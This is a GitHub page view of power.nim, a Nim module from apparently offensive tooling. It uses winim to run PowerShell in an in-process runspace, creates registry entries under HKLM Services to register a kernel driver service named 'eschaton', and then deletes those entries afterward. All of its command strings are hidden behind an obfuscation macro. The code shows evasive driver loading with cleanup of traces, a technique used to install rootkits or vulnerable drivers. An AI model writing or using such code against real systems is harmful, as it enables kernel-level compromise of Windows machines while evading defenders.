-
Notifications
You must be signed in to change notification settings - Fork 0
/
power.nim
43 lines (32 loc) · 1.58 KB
/
power.nim
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import winim/clr, sugar
import obf
proc exec_power*(driver_path : string, driver_file : string) =
var
Automation = load(obf("System.Management.Automation"))
RunspaceFactory = Automation.GetType(obf("System.Management.Automation.Runspaces.RunspaceFactory"))
runspace = @RunspaceFactory.CreateRunspace()
path = driver_path & driver_file
cmd1 = obf("New-Item -Path HKLM:\\System\\CurrentControlSet\\Services\\ -Name \"eschaton\"")
cmd2 = obf("New-ItemProperty -Path HKLM:\\System\\CurrentControlSet\\Services\\eschaton -Name \"ImagePath\" -Value \"") & path & obf("\" -PropertyType \"String\" ")
cmd3 = obf("New-ItemProperty -Path HKLM:\\System\\CurrentControlSet\\Services\\eschaton -Name \"Type\" -Value 1")
dump path
echo obf("[+] writing driver registry")
runspace.Open()
var pipeline = runspace.CreatePipeline()
pipeline.Commands.AddScript(cmd1)
pipeline.Commands.AddScript(cmd2)
pipeline.Commands.AddScript(cmd3)
discard pipeline.Invoke()
runspace.Close()
proc cleanup_power*() =
var
Automation = load(obf("System.Management.Automation"))
RunspaceFactory = Automation.GetType(obf("System.Management.Automation.Runspaces.RunspaceFactory"))
runspace = @RunspaceFactory.CreateRunspace()
cmd1 = obf("Remove-Item -Path HKLM:\\System\\CurrentControlSet\\Services\\eschaton")
runspace.Open()
var pipeline = runspace.CreatePipeline()
pipeline.Commands.AddScript(cmd1)
discard pipeline.Invoke()
runspace.Close()
echo obf("[+] driver registry cleaned")